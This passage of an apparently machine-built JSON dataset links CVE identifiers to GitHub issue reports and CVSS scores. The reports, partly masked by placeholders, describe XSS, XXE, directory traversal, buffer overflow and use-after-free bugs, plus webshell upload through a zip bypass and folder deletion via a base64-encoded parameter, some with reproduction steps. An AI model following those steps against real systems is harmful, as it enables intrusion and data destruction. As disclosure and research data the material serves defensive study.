  57806. "description": "APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG CODETAG APITAG \u53ef\u4ee5\u83b7\u53d6\u5230\u5f53\u524d\u7248\u672c\uff1a APITAG \uff0c\u2264\u8fd9\u4e2a\u7248\u672c\u7684\u90fd\u6709\u53ef\u80fd\u5b58\u5728\u6f0f\u6d1e URL\uff1a URLTAG URLTAG \u5217\u76ee\u5f55 APITAG \uff1a ERRORTAG \u76f4\u63a5\u628aPOST\u7684 rules \u548c ignore \u53c2\u6570\u4f20\u7ed9 APITAG \uff0c\u6839\u636e\u4e0a\u9762\u7684use\u5f15\u7528\u53ef\u4ee5\u77e5\u9053\u6587\u4ef6\u8def\u5f84\u5728 APITAG \uff1a ERRORTAG APITAG \u53ef\u4ee5\u4e0d\u7528\u5173\u6ce8\uff0c\u4ed6\u4f1a\u900f\u8fc7 APITAG \u53bb\u904d\u5386 APITAG \u6570\u7ec4\uff0c\u8c03\u7528 APITAG \u53bb\u9012\u5f52\u904d\u5386\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6\uff0c\u6700\u540e\u5728\u900f\u8fc7 APITAG APITAG ERRORTAG ERRORTAG ERRORTAG APITAG URLTAG URLTAG POST: APITAG \u4e5f\u53ef\u4ee5\u4f7f\u7528 APITAG \u6765\u8fdb\u884c\u76ee\u5f55\u7a7f\u8d8a APITAG \u6f14\u793a\u7ad9\uff1a FILETAG \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6 APITAG \uff1a ERRORTAG \u9996\u5148\u4eceGET\u8bfb\u53d6 encode \u53c2\u6570\u5e76\u4f7f\u7528 APITAG \u89e3\u7801\uff1a ERRORTAG \u89e3\u5bc6UTF8\u5b57\u7b26\u4e32\u7684\uff0c\u521a\u597d\u4e0a\u9762\u6709\u4e2a\u52a0\u5bc6UTF8\u5b57\u7b26\u4e32\u7684 APITAG \uff0c\u653b\u51fb\u65f6\u76f4\u63a5\u8c03\u7528\u90a3\u4e2a\u5c31\u53ef\u4ee5\u4e86\uff1a ERRORTAG \u8ddf\u8fdb APITAG \uff0c\u6587\u4ef6\u8def\u5f84 APITAG \uff1a ERRORTAG \u9996\u5148 APITAG \u4e0d\u80fd\u591f\u662f APITAG \uff0c\u63a5\u7740\u8ddf\u8fdb APITAG \uff1a ERRORTAG \u6709\u4e00\u4e2a\u5141\u8bb8\u7684\u5217\u8868\uff1a APITAG \u4e5f\u5c31\u662f\u8bf4 APITAG \u5fc5\u987b\u8981\u4e0d\u662f APITAG APITAG APITAG \u800c APITAG APITAG APITAG \u6765\u66ff\u6362 APITAG \uff0c\u4e5f\u5c31\u662f\u4f20\u5165\uff1a APITAG APITAG APITAG Windows\u8bfb\u53d6 APITAG \uff1a FILETAG \u6f14\u793a\u7ad9\u8bfb\u53d6 APITAG \uff1a FILETAG NUMBERTAG",
  57807. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57808. "severity": "HIGH",
  57809. "baseScore": 7.5,
  57810. "impactScore": 3.6,
  57811. "exploitabilityScore": 3.9
  57812. },
  57813. {
  57814. "CVE_ID": "CVE-2020-25574",
  57815. "Issue_Url_old": "https://github.com/hyperium/http/issues/352",
  57816. "Issue_Url_new": "https://github.com/hyperium/http/issues/352",
  57817. "Repo_new": "hyperium/http",
  57818. "Issue_Created_At": "2019-11-16T16:31:23Z",
  57819. "description": "Size issue in APITAG . URLTAG APITAG URLTAG method silently overflows to NUMBERTAG in release mode. This makes it possible to shrink the size of the map to NUMBERTAG with APITAG . If the map doesn't contain any entry, it sets the mask value to APITAG which is inconsistent but doesn't create any immediate harm. If the map contains any entry, the code will call APITAG and start infinite probing in this line URLTAG . Another problem is that the assertion for APITAG doesn't exist here, so it is possible to grow the map larger than APITAG . Demonstration URLTAG",
  57820. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57821. "severity": "HIGH",
  57822. "baseScore": 7.5,
  57823. "impactScore": 3.6,
  57824. "exploitabilityScore": 3.9
  57825. },
  57826. {
  57827. "CVE_ID": "CVE-2020-25614",
  57828. "Issue_Url_old": "https://github.com/antchfx/xmlquery/issues/39",
  57829. "Issue_Url_new": "https://github.com/antchfx/xmlquery/issues/39",
  57830. "Repo_new": "antchfx/xmlquery",
  57831. "Issue_Created_At": "2020-08-29T08:57:03Z",
  57832. "description": "Denial of Service (SIGSEGV) at xmlquery.( APITAG Summary The APITAG function allows all response types/formats to be parsed _(other than XML)_, so that it can proceed to the next process (e.g. APITAG from APITAG ) without validation. Description This security issue affects all xmlquery versions. Steps to Reproduce CODETAG The logs will look similar to the following: ERRORTAG Vulnerable code: URLTAG Recommended Mitigations Validate the response from URLs loaded in APITAG ; if it is not in XML format, return an error.",
  57833. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57834. "severity": "CRITICAL",
  57835. "baseScore": 9.8,
  57836. "impactScore": 5.9,
  57837. "exploitabilityScore": 3.9
  57838. },
  57839. {
  57840. "CVE_ID": "CVE-2020-25636",
  57841. "Issue_Url_old": "https://github.com/ansible-collections/community.aws/issues/221",
  57842. "Issue_Url_new": "https://github.com/ansible-collections/community.aws/issues/221",
  57843. "Repo_new": "ansible-collections/community.aws",
  57844. "Issue_Created_At": "2020-09-04T15:15:07Z",
  57845. "description": "aws_ssm connection plugin should namespace its file transfers. SUMMARY The aws_ssm connection plugin uses an s3 buckets to transfer files to instances. It writes these files directly to the root of the bucket. If multiple ansible processes are running and sharing the same bucket at the same time, collisions could happen. ISSUE TYPE Bug Report COMPONENT NAME aws_ssm connection plugin ANSIBLE VERSION ansible NUMBERTAG rc2 config file = PATHTAG configured module search path = PATHTAG PATHTAG ansible python module location = PATHTAG executable location = PATHTAG python version NUMBERTAG default, Jul NUMBERTAG GCC NUMBERTAG CONFIGURATION n/a OS / ENVIRONMENT debian NUMBERTAG STEPS TO REPRODUCE NUMBERTAG use the aws_ssm plugin NUMBERTAG look at the s3 bucket it used NUMBERTAG observe that the files are not namespaced by instance id EXPECTED RESULTS The plugin should transfer files in namespaced keys (folders) to avoid collisions. The namespace key should be configurable so specific IAM policies can be granted. ACTUAL RESULTS Files are written to the root of the s3 bucket.",
  57846. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  57847. "severity": "HIGH",
  57848. "baseScore": 7.1,
  57849. "impactScore": 5.2,
  57850. "exploitabilityScore": 1.8
  57851. },
  57852. {
  57853. "CVE_ID": "CVE-2020-25640",
  57854. "Issue_Url_old": "https://github.com/amqphub/amqp-10-resource-adapter/issues/13",
  57855. "Issue_Url_new": "https://github.com/amqphub/amqp-10-resource-adapter/issues/13",
  57856. "Repo_new": "amqphub/amqp-10-resource-adapter",
  57857. "Issue_Created_At": "2020-09-10T14:27:51Z",
  57858. "description": "JMS Connection password logged in cleartext. In the following log message, I can see my password in cleartext. Twice. ERRORTAG",
  57859. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  57860. "severity": "MEDIUM",
  57861. "baseScore": 5.3,
  57862. "impactScore": 3.6,
  57863. "exploitabilityScore": 1.6
  57864. },
  57865. {
  57866. "CVE_ID": "CVE-2020-25649",
  57867. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2589",
  57868. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2589",
  57869. "Repo_new": "fasterxml/jackson-databind",
  57870. "Issue_Created_At": "2020-01-09T09:23:57Z",
  57871. "description": "NUMBERTAG APITAG is not enough to stop expansion. As per description: URLTAG and URLTAG is not enough to stop expansion of entities. Depending on the provider (xerces) being used it might work with the current APITAG or not. If the JDK default is used, it won't allow entities to be expanded; however, if another provider from the classpath is used it might, for instance, JDK8 does not allow (iirc) but xerces NUMBERTAG does. Reference: URLTAG I tinkered a bit with databind classes and I had something like: CODETAG",
  57872. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  57873. "severity": "HIGH",
  57874. "baseScore": 7.5,
  57875. "impactScore": 3.6,
  57876. "exploitabilityScore": 3.9
  57877. },
  57878. {
  57879. "CVE_ID": "CVE-2020-25658",
  57880. "Issue_Url_old": "https://github.com/sybrenstuvel/python-rsa/issues/165",
  57881. "Issue_Url_new": "https://github.com/sybrenstuvel/python-rsa/issues/165",
  57882. "Repo_new": "sybrenstuvel/python-rsa",
  57883. "Issue_Created_At": "2020-10-26T18:16:44Z",
  57884. "description": "CVETAG Bleichenbacher style timing oracle in PKCS NUMBERTAG decryption code. Current PKCS NUMBERTAG decryption code: URLTAG performs the checks on the decrypted value in turn, aborting as soon as first error is found, it also raises an exception in case of errors. This likely provides enough of a timing side channel to mount a Bleichenbacher style attack. While it's unlikely that a completely side channel free implementation is possible (see URLTAG ), it should be possible to minimise the side channel by making at least the execution path the same irrespective of previous checks and by providing an API that returns a randomly generated secret in case of error (instead of leaking the timing side channel by rising an exception) for uses that feed the decrypted value directly to a hash or use it as an symmetric key.",
  57885. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57886. "severity": "MEDIUM",
  57887. "baseScore": 5.9,
  57888. "impactScore": 3.6,
  57889. "exploitabilityScore": 2.2
  57890. },
  57891. {
  57892. "CVE_ID": "CVE-2020-25663",
  57893. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1723",
  57894. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1723",
  57895. "Repo_new": "imagemagick/imagemagick",
  57896. "Issue_Created_At": "2019-10-06T12:41:15Z",
  57897. "description": "heap use after free at APITAG accessor.h in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap use after free at APITAG APITAG in APITAG Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING ` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG CFLAGS=\" fsanitize=address,undefined g\" CXXFLAGS=\" fsanitize=address,undefined g\" ./configure disable openmp APITAG",
  57898. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57899. "severity": "MEDIUM",
  57900. "baseScore": 5.5,
  57901. "impactScore": 3.6,
  57902. "exploitabilityScore": 1.8
  57903. },
  57904. {
  57905. "CVE_ID": "CVE-2020-25706",
  57906. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3723",
  57907. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3723",
  57908. "Repo_new": "cacti/cacti",
  57909. "Issue_Created_At": "2020-07-24T13:25:27Z",
  57910. "description": "the XSS issue has been found on FILETAG APITAG NUMBERTAG The vulnerability could be exploited by an attacker by forcing a user to upload a file with a \"name\" or \"xml_path\" containing client side code. FILETAG FILETAG FILETAG",
  57911. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  57912. "severity": "MEDIUM",
  57913. "baseScore": 6.1,
  57914. "impactScore": 2.7,
  57915. "exploitabilityScore": 2.8
  57916. },
  57917. {
  57918. "CVE_ID": "CVE-2020-25750",
  57919. "Issue_Url_old": "https://github.com/DevGroup-ru/dotplant2/issues/400",
  57920. "Issue_Url_new": "https://github.com/devgroup-ru/dotplant2/issues/400",
  57921. "Repo_new": "devgroup-ru/dotplant2",
  57922. "Issue_Created_At": "2020-09-13T13:11:04Z",
  57923. "description": "XXE Vulnerability. In class APITAG PATHTAG ), there is an XXE vulnerability in the APITAG function. ERRORTAG The user input ($_POST['xml']) has been passed to simplexml_load_string without sanitization. Although this parser does not print anything, attackers could also use blind XXE to obtain sensitive information. You could use APITAG to avoid this vulnerability. Thx",
  57924. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57925. "severity": "HIGH",
  57926. "baseScore": 7.5,
  57927. "impactScore": 3.6,
  57928. "exploitabilityScore": 3.9
  57929. },
  57930. {
  57931. "CVE_ID": "CVE-2020-25756",
  57932. "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1135",
  57933. "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1135",
  57934. "Repo_new": "cesanta/mongoose",
  57935. "Issue_Created_At": "2020-08-12T22:11:29Z",
  57936. "description": "A buffer overflow error in mg_get_http_header. A buffer overflow error in mg_get_http_header function in PATHTAG in Mongoose NUMBERTAG where header_names and header_values have a bound of (MG_MAX_HTTP_HEADERS); however, there is no check to ensure that the loop does not exceed the upper bound. A maliciously crafted HTTP header can trigger this bug. To fix it, modify the loop condition into: for (i NUMBERTAG i < MG_MAX_HTTP_HEADERS && hm >header_names[i].len NUMBERTAG i++)",
  57937. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57938. "severity": "CRITICAL",
  57939. "baseScore": 9.8,
  57940. "impactScore": 5.9,
  57941. "exploitabilityScore": 3.9
  57942. },
  57943. {
  57944. "CVE_ID": "CVE-2020-25790",
  57945. "Issue_Url_old": "https://github.com/Typesetter/Typesetter/issues/674",
  57946. "Issue_Url_new": "https://github.com/typesetter/typesetter/issues/674",
  57947. "Repo_new": "typesetter/typesetter",
  57948. "Issue_Created_At": "2020-09-18T17:44:24Z",
  57949. "description": "Bypass File upload leads to Command execution. Hello all, I was testing the upload mechanism, and I found that it is possible to bypass the protection for .php files by placing the .php inside a .zip file and extracting it. Once this is done, it is possible to execute commands on the machine using a malicious php file (webshell). Okay, that and the viability decreased a little because it is an admin functionality, however, if it is not allowed to upload a .php file, then placing the same file inside a .zip and extracting and executing it should also not be allowed . Steps to reproduce NUMBERTAG As admin go to Content menu and click on Uploaded files NUMBERTAG Inside the try to upload a .php file, and NUMBERTAG try to upload a .php file directly, check that it is not possible NUMBERTAG Take the same .php file and place it in a .zip and upload it NUMBERTAG Extract through functionality and open the .php file Obs : A strange behavior was that, after extracting the PHP file in functionality, it is seen as HTML. APITAG ==> Executing Commands FILETAG ==> Try to upload a .php direct FILETAG",
  57950. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  57951. "severity": "HIGH",
  57952. "baseScore": 7.2,
  57953. "impactScore": 5.9,
  57954. "exploitabilityScore": 1.2
  57955. },
  57956. {
  57957. "CVE_ID": "CVE-2020-25791",
  57958. "Issue_Url_old": "https://github.com/bodil/sized-chunks/issues/11",
  57959. "Issue_Url_new": "https://github.com/bodil/sized-chunks/issues/11",
  57960. "Repo_new": "bodil/sized-chunks",
  57961. "Issue_Created_At": "2020-09-06T22:04:56Z",
  57962. "description": "Multiple soundness issues in Chunk and APITAG Hello, we have noticed a soundness issue and/or a potential security vulnerability in this crate while performing a security scan on crates.io. Description Chunk: Array size is not checked when constructed with APITAG and APITAG . Array size is not checked when constructed with APITAG . Clone and APITAG are not panic safe; A panicking iterator causes memory safety issues with them. APITAG Generates unaligned references for types with a large alignment requirement. Demonstration Crate: sized chunks Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG Cargo flags: release ERRORTAG Output: ERRORTAG Return Code NUMBERTAG",
  57963. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57964. "severity": "HIGH",
  57965. "baseScore": 7.5,
  57966. "impactScore": 3.6,
  57967. "exploitabilityScore": 3.9
  57968. },
  57969. {
  57970. "CVE_ID": "CVE-2020-25821",
  57971. "Issue_Url_old": "https://github.com/jgm/peg-markdown/issues/43",
  57972. "Issue_Url_new": "https://github.com/jgm/peg-markdown/issues/43",
  57973. "Repo_new": "jgm/peg-markdown",
  57974. "Issue_Created_At": "2020-09-21T10:01:11Z",
  57975. "description": "NULL pointer dereference in the APITAG function. Hi, While fuzzing peg markdown with Honggfuzz, I found a NULL pointer dereference in the APITAG function. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  57976. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57977. "severity": "HIGH",
  57978. "baseScore": 7.5,
  57979. "impactScore": 3.6,
  57980. "exploitabilityScore": 3.9
  57981. },
  57982. {
  57983. "CVE_ID": "CVE-2020-25825",
  57984. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6605",
  57985. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6605",
  57986. "Repo_new": "octopusdeploy/issues",
  57987. "Issue_Created_At": "2020-10-05T22:30:33Z",
  57988. "description": "Bash scripts can reveal sensitive variable values NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
  57989. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57990. "severity": "HIGH",
  57991. "baseScore": 7.5,
  57992. "impactScore": 3.6,
  57993. "exploitabilityScore": 3.9
  57994. },
  57995. {
  57996. "CVE_ID": "CVE-2020-25825",
  57997. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6606",
  57998. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6606",
  57999. "Repo_new": "octopusdeploy/issues",
  58000. "Issue_Created_At": "2020-10-05T22:32:55Z",
  58001. "description": "Bash scripts can reveal sensitive variable values NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
  58002. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58003. "severity": "HIGH",
  58004. "baseScore": 7.5,
  58005. "impactScore": 3.6,
  58006. "exploitabilityScore": 3.9
  58007. },
  58008. {
  58009. "CVE_ID": "CVE-2020-25825",
  58010. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6604",
  58011. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6604",
  58012. "Repo_new": "octopusdeploy/issues",
  58013. "Issue_Created_At": "2020-10-05T22:27:43Z",
  58014. "description": "Bash scripts can reveal sensitive variable values. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . x] I have raised a CVE according to our [CVE process URLTAG x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description Bash scripts, when configured in a certain way, can reveal reveal enough information to determine sensitive variable values in task logs. Other script types are not affected. Affected versions Octopus Server NUMBERTAG Links CVE: [ CVETAG URLTAG Internal Issue: URLTAG PR: URLTAG",
  58015. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58016. "severity": "HIGH",
  58017. "baseScore": 7.5,
  58018. "impactScore": 3.6,
  58019. "exploitabilityScore": 3.9
  58020. },
  58021. {
  58022. "CVE_ID": "CVE-2020-25825",
  58023. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6607",
  58024. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6607",
  58025. "Repo_new": "octopusdeploy/issues",
  58026. "Issue_Created_At": "2020-10-05T22:34:11Z",
  58027. "description": "Bash scripts can reveal sensitive variable values NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
  58028. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58029. "severity": "HIGH",
  58030. "baseScore": 7.5,
  58031. "impactScore": 3.6,
  58032. "exploitabilityScore": 3.9
  58033. },
  58034. {
  58035. "CVE_ID": "CVE-2020-25872",
  58036. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/34",
  58037. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/34",
  58038. "Repo_new": "philippe/frogcms",
  58039. "Issue_Created_At": "2020-09-14T17:17:47Z",
  58040. "description": "APITAG Directory Traversal Vulnerability. There is a directory traversal vulnerability when logged in as an admin and viewing the uploaded files. An attacker can read arbitrary files on a remote server via the GET request urlencode parameter. APITAG FILETAG . APITAG FILETAG APITAG FILETAG . APITAG FILETAG",
  58041. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  58042. "severity": "MEDIUM",
  58043. "baseScore": 4.9,
  58044. "impactScore": 3.6,
  58045. "exploitabilityScore": 1.2
  58046. },
  58047. {
  58048. "CVE_ID": "CVE-2020-25873",
  58049. "Issue_Url_old": "https://github.com/baijiacms/baijiacmsV4/issues/6",
  58050. "Issue_Url_new": "https://github.com/baijiacms/baijiacmsv4/issues/6",
  58051. "Repo_new": "baijiacms/baijiacmsv4",
  58052. "Issue_Created_At": "2020-09-19T08:11:29Z",
  58053. "description": "APITAG directory traversal vulnerability. Directory traversal vulnerability in APITAG allows remote authenticated attackers to delete arbitrary folders on the server via unspecified vectors. Vulnerable code is in PATHTAG CODETAG The origin request is APITAG ,which is used to delete database backuped folder.We can change the parameter \"id\" to delete any folders. For example NUMBERTAG Create a folder named test FILETAG NUMBERTAG Base NUMBERTAG encode PATHTAG FILETAG NUMBERTAG Change the parameter id to APITAG and request this url \" URLTAG \" FILETAG NUMBERTAG Now the test folder is deleted. FILETAG NUMBERTAG An authenticated attacker can destroy the whole website just use the parameter PATHTAG after base NUMBERTAG encode.",
  58054. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  58055. "severity": "MEDIUM",
  58056. "baseScore": 6.5,
  58057. "impactScore": 3.6,
  58058. "exploitabilityScore": 2.8
  58059. },
  58060. {
  58061. "CVE_ID": "CVE-2020-25875",
  58062. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/4",
  58063. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/4",
  58064. "Repo_new": "r0ck3t1973/xss_payload",
  58065. "Issue_Created_At": "2020-09-15T04:18:12Z",
  58066. "description": "Cross Site Script Vulnerability on \"UI Elments\" in Codoforum feature NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click smileys NUMBERTAG Choose smileys >> Click Edit NUMBERTAG Insert Payload APITAG Code': '> APITAG NUMBERTAG Click Save NUMBERTAG Go to Page PATHTAG NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG Choose smiley FILETAG NUMBERTAG insert payload FILETAG NUMBERTAG ss alert mess FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
  58067. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  58068. "severity": "MEDIUM",
  58069. "baseScore": 5.4,
  58070. "impactScore": 2.7,
  58071. "exploitabilityScore": 2.3
  58072. },
  58073. {
  58074. "CVE_ID": "CVE-2020-25876",
  58075. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/3",
  58076. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/3",
  58077. "Repo_new": "r0ck3t1973/xss_payload",
  58078. "Issue_Created_At": "2020-09-15T03:10:06Z",
  58079. "description": "Cross Site Script Vulnerability on APITAG in Codoforum feature NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click Add Page NUMBERTAG Insert Payload in APITAG Title': '> APITAG NUMBERTAG Click Save NUMBERTAG Go to Page PATHTAG NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG Add Pages FILETAG NUMBERTAG ss Message FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
  58080. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  58081. "severity": "MEDIUM",
  58082. "baseScore": 5.4,
  58083. "impactScore": 2.7,
  58084. "exploitabilityScore": 2.3
  58085. },
  58086. {
  58087. "CVE_ID": "CVE-2020-25877",
  58088. "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/401",
  58089. "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/401",
  58090. "Repo_new": "blackcatdevelopment/blackcatcms",
  58091. "Issue_Created_At": "2020-09-17T04:53:17Z",
  58092. "description": "Cross Site Script Vulnerability on APITAG in APITAG CMS NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Page\" feature in Admin To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Page NUMBERTAG Insert Payload in APITAG '> APITAG NUMBERTAG Click APITAG Page NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG insert payload FILETAG NUMBERTAG ss alert message FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
  58093. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  58094. "severity": "MEDIUM",
  58095. "baseScore": 5.4,
  58096. "impactScore": 2.7,
  58097. "exploitabilityScore": 2.3
  58098. },
  58099. {
  58100. "CVE_ID": "CVE-2020-25878",
  58101. "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/402",
  58102. "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/402",
  58103. "Repo_new": "blackcatdevelopment/blackcatcms",
  58104. "Issue_Created_At": "2020-09-18T01:32:54Z",
  58105. "description": "Cross Site Script Vulnerability on APITAG Tools\" in APITAG CMS NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Tools\" feature in Admin To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click Chose: +/ APITAG CMS Output Filters: PATHTAG +/ Droplets: PATHTAG NUMBERTAG Insert Payload '> APITAG \"> APITAG NUMBERTAG Save NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG APITAG CMS Output Filters: PATHTAG FILETAG FILETAG FILETAG NUMBERTAG Droplets: PATHTAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
  58106. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  58107. "severity": "MEDIUM",
  58108. "baseScore": 4.8,
  58109. "impactScore": 2.7,
  58110. "exploitabilityScore": 1.7
  58111. },
  58112. {
  58113. "CVE_ID": "CVE-2020-25879",
  58114. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/5",
  58115. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/5",
  58116. "Repo_new": "r0ck3t1973/xss_payload",
  58117. "Issue_Created_At": "2020-09-22T07:40:45Z",
  58118. "description": "Cross Site Script Vulnerability on APITAG in Codoforum feature NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Users\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click Edit Username Insert Payload \"> APITAG NUMBERTAG Click Save NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG Edit Username FILETAG NUMBERTAG ss alert mess FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
  58119. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
